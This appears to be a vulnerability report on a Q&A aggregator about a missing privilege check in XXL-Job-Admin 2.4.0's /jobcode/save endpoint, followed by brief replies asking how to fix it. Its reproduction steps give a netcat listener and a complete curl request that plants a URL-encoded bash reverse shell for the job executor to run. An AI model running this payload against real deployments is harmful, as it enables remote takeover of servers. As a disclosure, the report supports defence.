Remote Code Execution in /xxl-job-admin/jobcode/save

lrpiutwd  于 4个月前  发布在  其他
关注(0)|答案(4)|浏览(259)

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that the /xxl-job-admin/jobcode/save does not validate user privilege. The modification of code in running cronjob for job executor does not require privileged user access. By leveraging the vulnerability, users could craft HTTP requests to modify and run arbitrary code (e.g., sensitive information disclosure OR reverse shell) on the job executor.

Steps to reproduce the behavior

Step 1: Create a listener
nc -nlvp 8888

Step 2: Create a unprivileged user and get its cookie

Step 3: Craft an HTTP request for job code saving. This demonstration will be a reverse shell payload.
curl http://<IP Address>:<Port>/xxl-job-admin/jobcode/save --cookie "xxljob_adminlte_settings=on; XXL_JOB_LOGIN_IDENTITY=<Unprivileged Cookie>" -d "id=2&glueSource=%23%2Fbin%2Fbash%0Abash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<Reverse shell IP>%2F<Reverse shell port>%200%3E%261&glueRemark=Test"

Step 4. Trigger the cronjob/wait until cronjob executes. A reverse shell will be executed.

68de4m5k

68de4m5k1#

Create an unprivileged user and get its cookie, which I don't think is easy for attackers.

abithluo

abithluo2#

Agree. The assumption of the attack is that you gained an unprivileged account.

cuxqih21

cuxqih213#

所以这个漏洞该怎么修复呢

oogrdqng

oogrdqng4#

同问,这个漏洞该如何修复呢。

相关问题